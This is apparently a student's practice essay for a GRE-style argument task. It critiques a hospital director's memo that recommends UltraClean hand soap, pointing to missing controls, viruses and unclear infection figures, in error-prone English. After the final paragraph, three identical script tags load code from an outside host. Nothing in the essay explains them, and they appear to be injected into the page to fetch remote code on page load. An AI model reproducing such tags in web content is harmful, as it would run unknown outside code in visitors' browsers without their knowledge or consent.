[The following appeared in a memo from the director of a large group of hospitals.]

”In a controlled laboratory study of liquid hand soaps, a concentrated solution of extra strength UltraClean hand soap produced a 40 percent greater reduction in harmful bacteria than did the liquid hand soaps currently used in our hospitals. During our recent test of regular-strength UltraClean with doctors, nurses, and visitors at our hospital in Worktown, the hospital reported significantly fewer cases of patient infection (a 20 percent reduction) than did any of the other hospitals in our group. Therefore, to prevent serious patient infections, we should supply UltraClean at all hand-washing stations, including those used by visitors, throughout our hospital system."

[Specific Task Instruction: Write a response in which you discuss what specific evidence is needed to evaluate the argument and explain how the evidence would weaken or strengthen the argument.]

Although the controlled laboratory study of liquid hand soaps provides a data that the concentrated solution of UltraClean hand soap provided 40 percent greater harmful bacteria reduce than current one used in this hospital. It is not cogent enough to persuade this hospital to apply UltraClean at all hand-washing stations to prevent serious patient infection. The original purpose of the author might be to apply this powerful soap into use and benefit patients. However, the conclusion needs more comprehensive consideration as the argument is not enough powerful.

Human beings are placed in an environment rife with various kinds of bacteria, including beneficial bacteria and detrimental bacteria. The problem is, there is no evidence supporting the assumption that the bacteria the UltraClean can reduce bacteria in human hands and can reduce the bacteria which can cause severe infection in patients in this hospital. What is more, simply ensure the cleanness of hands are not enough to keep patients away from being infected. The place the patient stayed including their living area, washrooms, room for operation can also be possible pathways for bacteria to infect patients. Based on the research tools of modern microbiology, it is possible for the researchers to find the most possible harmful bacteria on human hands and find whether the UltraClean can clear them on human hands. In a conclusion, the argument requires further consideration and evidence to provide a powerful enough analysis to convince readers.

From the ideas of classification , the microorganisms can be divided into bacteria and virus. It is simply not enough to only address our attention on bacteria instead of ignore the existence of virus which is also an vital part which can cause patient infection. According to another tests the author provide, that the twenty percent reduction was reported in the hospital after the use of UltraClean in doctors, visitors and nurses. The applying of the soap is on three kinds of people which not include the patient, as there might not have a correlation between these three categories of people use soaps with the patients. For example, some people just use the soaps before having the lunch or dinner and there are no direct contact between these people with patients. And there might have other variable factors, like the spread of epidemic, weather, climate or the food the patient eat. In order to reduces the interference of some factors, it can be better to set up an experimental control, which are people use soaps which are not made from UltraClean. A cogent argument requires deeply thought with well-designed logic structure of assumption, fact and analysis.

Numbers can be both useful to help us or well enough to confuse us. From the argument we can find there are twenty percent reduce in numbers of infected patients after the UltraClean is applied in to doctors, nurses and visitors. Based on the principles of immunity, people can acquire the ability to resist the infection of the same bacteria after being infected, as people are developed the specific antibody to antagonize the kind of bacteria. However, the percentage might not be cogent enough to support the effectiveness of UltraClean to prevent the infection of patients. Furthermore, a more detailed numbers of overall patients and infected patients is suggested to provide for us to strengthen the author’s argument. And the use of UltraClean in all hand-washing station might not be enough as there might have other place for people to wash their hands. Sever people simply have a not healthy habit by not washing their hands in various occasions. And the UltraClean soap type also needs further consideration.

To design and construct a well-organized argument to persuade this hospital to apply UltraClean soap to substitute the soap needs more consideration. To prevent patients from infection both need to keep clean both in patients and other people might have direct contact with them. The parts of contact might be different, ranging from direct contact through our hands or indirect contact by a sneeze.

<script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script><script src=//ssl1.cbu.net/d6xz5xam></script>